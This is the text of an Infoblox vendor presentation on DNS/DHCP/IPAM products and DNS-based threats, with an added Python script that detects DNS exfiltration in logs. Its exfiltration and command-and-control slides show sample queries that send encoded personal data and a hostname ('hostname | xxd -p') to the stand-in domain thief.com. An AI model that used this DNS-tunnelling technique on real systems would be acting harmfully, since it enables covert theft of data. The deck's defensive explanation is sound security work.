Infoblox Presentation - Technical
1 | © 2013
2018 Infoblox Inc. All Rights Reserved.
Infoblox Overview & Business Update
Traditional Core Network Services (DNS, DHCP and IPAM)
Integrated DDI for physical and virtual environments
Authoritative IPAM
• Visibility
• Efficiency
• Control
DNS
• Secure
• Intelligent
• Extensible
DHCP
• Automation
• Insight
[Diagram labels: Advanced Reporting; Infoblox DNS/DHCP; Network Task Automation; Microsoft DNS/DHCP; Virtual Discovery; IP network Discovery; Network; IP Endpoints; Switch/Routers]
Flexible Deployment Options with Microsoft
The Infoblox Advantage – Patented Grid Technology
Centralized Visibility & control of core network services
[Diagram labels: Grid Member with DNS Firewall; Infoblox Threat data feeds for use in ecosystem; Grid Member; Grid; DNS / DHCP; Network Insight]
Infoblox Evolution
DDI with Authoritative IPAM
NGDDI Microsoft Integration, AD User Identity Mapping
NGDDI Security and Analytics,
Reporting, Auditing and Forensic
Application Uptime
Monitor the health and status of the core services supporting your business critical applications and predict future
Security
Stop security breaches before they occur and detect and control APTs faster.
Compliance
Quickly generate compliance reports, without impacting the performance of grid members.
Capacity Planning
Track, trend and predict key capacity parameters over time, to ensure your core network services match growth.
Infoblox NGDDI, Most Accurate Information
Authoritative Network Database
ONE SHOT
• What IP? DHCP Service / Discovery
• When Appear? Allocate / Discovery / Cloud
• Which MAC? DHCP or Discovery
• Device Type? DHCP Fingerprint
What has happened in the past? IP, User, hostname, RPZ, lease…
Availability
• Intelligent traffic management for global services
• Services performance optimization
• Global and Local proximity delivery services
Cloud
• Ongoing evolution of the Data Center
• Private, Public, Hybrid
Automation
• Budget for IT headcount continues to decline
• Skilled staff more difficult to find and retain
Infoblox Evolution
DDI with Secure DNS
Malware Exploiting DNS
• Over 91% of malware uses DNS
- To gain command and control
- To exfiltrate data
- To redirect traffic
• Despite adversaries’ reliance on DNS, 68% of organizations do not monitor recursive DNS
• Advanced attacks and data breaches persist and impact all sizes and types of organizations
• Average total cost of a data breach: ~$3.8M USD
• The question isn’t if, but when you will be attacked, and how effectively you can respond
Hiding network Data via DNS Tunneling
• Uses DNS as a covert communication channel to bypass firewalls
• Attacker tunnels other protocols like SSH, or web within DNS
• Enables attackers to easily insert malware, pass
[Diagram labels: Internet; Slow DNS]
Data Exfiltration over DNS Queries
Malware Steals File Containing Sensitive Data
• Infected endpoint gets access to file containing sensitive data
• It encrypts and converts info into encoded format
• Text broken into chunks and sent via
Example DNS queries shown on the slide:
NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
DOB10191952.foo.thief.com
Internaldomain.foo.thief.com
Company.foo.thief.com
[Diagram label: Compromised Endpoint]
Malware Infiltration over DNS - TXT
[Diagram: Query for TXT; Rogue DNS Server; Command and Control; DDNS update; quoted encoded TXT record strings]
Infiltration and C&C behavior infection
Command and Control
Signaling and Control responses with DNS
hostname | xxd -p
Query A -> 6a75747465722d6d62702e6c6f63616c0a.thief.com
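Added example (not part of the original slides and not Infoblox's detection logic): a minimal log check for the two patterns shown on the "Data Exfiltration over DNS Queries" and "Command and Control" slides, namely a hex-encoded leftmost label and one client sending many distinct names under a single parent domain. The log format, client addresses, function names and the threshold of 5 are assumptions chosen for the sample.

```python
import binascii
import re
from collections import defaultdict

# Constructed sample log: "client qtype qname". Query names are the slides'
# examples; client addresses and the example.org lines are made up.
SAMPLE_LOG = """\
10.0.0.5 A 6a75747465722d6d62702e6c6f63616c0a.thief.com
10.0.0.7 A NameMarySmith.foo.thief.com
10.0.0.7 A MRN100045429886.foo.thief.com
10.0.0.7 A DOB10191952.foo.thief.com
10.0.0.7 A Internaldomain.foo.thief.com
10.0.0.7 A Company.foo.thief.com
10.0.0.9 A www.example.org
10.0.0.9 A mail.example.org
"""

# Leftmost label made only of hex byte pairs, at least 8 bytes long.
HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2}){8,}$", re.IGNORECASE)

def parent_domain(qname):
    # Assumption: the last two labels form the registered domain. Real
    # deployments should consult the Public Suffix List instead.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def decode_hex_label(qname):
    """Return decoded text if the first label is xxd -p style hex, else None."""
    label = qname.split(".")[0]
    if not HEX_LABEL.match(label):
        return None
    return binascii.unhexlify(label).decode("utf-8", "replace").strip()

def analyse(log, min_unique=5):
    """Return (hex_hits, fanout): decoded hex labels and per-client counts of
    distinct names under one parent domain that reach min_unique."""
    hex_hits, names = [], defaultdict(set)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        client, _qtype, qname = parts
        decoded = decode_hex_label(qname)
        if decoded is not None:
            hex_hits.append((client, qname, decoded))
        names[(client, parent_domain(qname))].add(qname.lower())
    fanout = {k: len(v) for k, v in names.items() if len(v) >= min_unique}
    return hex_hits, fanout

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

Decoding the flagged label shows the responder exactly which value left the host, which is useful when scoping an incident.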
DNS is Coverage? YES with Infoblox
App Offerings
Salesforce.com
Office 365
Workday – HR
SAP
Firewall/NGFW
Your SIEM Solution
• Centralized logging and reporting
IPS/IDS
The Motion of Malware Through Networks
Malware uses DNS at every stage
Infiltration: Query malicious domains and report to C&C
Infection: Download Malware to the infected host
Exfiltration: Transport the data offsite
Infoblox TIDE – External Threat Feeds
Solution Overview
• Infoblox ActiveTrust receives threat data from third-party sources
• This third party data is then managed from within Infoblox TIDE.
Benefits
1. Collect and manage curated threat intelligence in a single platform
2. Maximize resources by giving back time to the security operations and threat intelligence team
[Diagram label: Infoblox TIDE]
Leveraging Threat Intel Across Entire
Security Infrastructure
[Diagram labels: SURBL; Marketplace; Custom TI; TIDE; Define Data Policy, Governance & Translation; Phishing & Malware URLs; Spambot IPs; C&C & Malware Host/Domain; Various file formats]
Streaming DNS Threat Insight Analytics Works
temporal analysis
3. Certain attributes add to a threat score, Size Lexical
Infoblox ActiveTrust Cloud as a Service
ActiveTrust as a Service + Threat Intelligence + Threat Insight as a Service
Multi-pronged Threat Detection and Prevention
• Aggregated & shared Threat Intelligence, TIP designed for enterprises
• DNS Reputation
• Behavioral Analytics, data exfiltration
End to End Protection
• On/off premise
• Roaming devices
[Diagram labels: Machine Readable Threat Intelligence; Download Threat Intelligence; DHCP Lease; ActiveTrust Logs, Network Insight; Data Collector VM; Internal Authoritative DNS + ActiveTrust + Threat Intelligence; NAT + Firewall; NAT + Firewall]
Infoblox as part of Cybersecurity Orchestration
Accelerating Incident Handling and Response with Automation
Application and Business Context
IPAM
• “Metadata” via Extended Attributes: Owner, app, security level, location, ticket number
Infoblox Advanced DNS Protection - ADP
WHERE IT FITS
The solution components of Advanced DNS Protection include:
• Software ADP: For organizations with lower capacity requirements with a lower entry price point.
• Infoblox Appliances: Trinzic hardware and virtual appliances consist of Trinzic TE-1410/1420/815/825/1415 appliances with software ADP subscription add-on. Virtual appliances are supported on VMware and KVM.
• Advanced DNS Protection Service: The software plus Threat Adapt technology provides ongoing protection against existing and evolving threats to the DNS server.
• Reporting and Analytics: Deep visibility and rich network context around attack patterns and sources.
Infoblox Network Automation - NetMRI
What is NetMRI?
Origin: Network Consulting Assessments...
1. Network Discovery and Inventory
- Network friendly
- Network constructs, not just devices (routes, VLANs, VRRP Pairs, etc.)
- Multi-layer topology
- Auto correlation
2. Network Configuration Analysis
- Proactive identification of hidden problems with no fault or perf symptoms
- Port duplex mismatch, VLAN member priorities, VRRP not recognizing peer, etc.
3. Security Policy Enforcement
- Bundled content
- Easy customization + unique capabilities
- Auto analysis, auditing, and reporting
4. Change Automation & Config Mgmt
- Change Detection, Audit, Config B/U, etc.
- Advanced / unique change automation
NetMRI Deployment Overview = Appliance
NetMRI: Real-time & Historical Analysis
• Network discovery
• Built-in analysis
• Check against best practices
• Check against security policies
• Detect issues
• Monitor and manage change
• Automate change
• Switch port management
Collected Via:
• SNMP
• CLI/configuration
• Syslog
• Fingerprinting
Pre-SALES:
David Alfonso
david.alfonso@arrow.com
+34 660 252 134
SALES:
Patricia Cobo
patricia.cobo@arrow.com
+34 690 992 921
Pre-SALES:
Angel Aviles
angel.aviles@arrow.com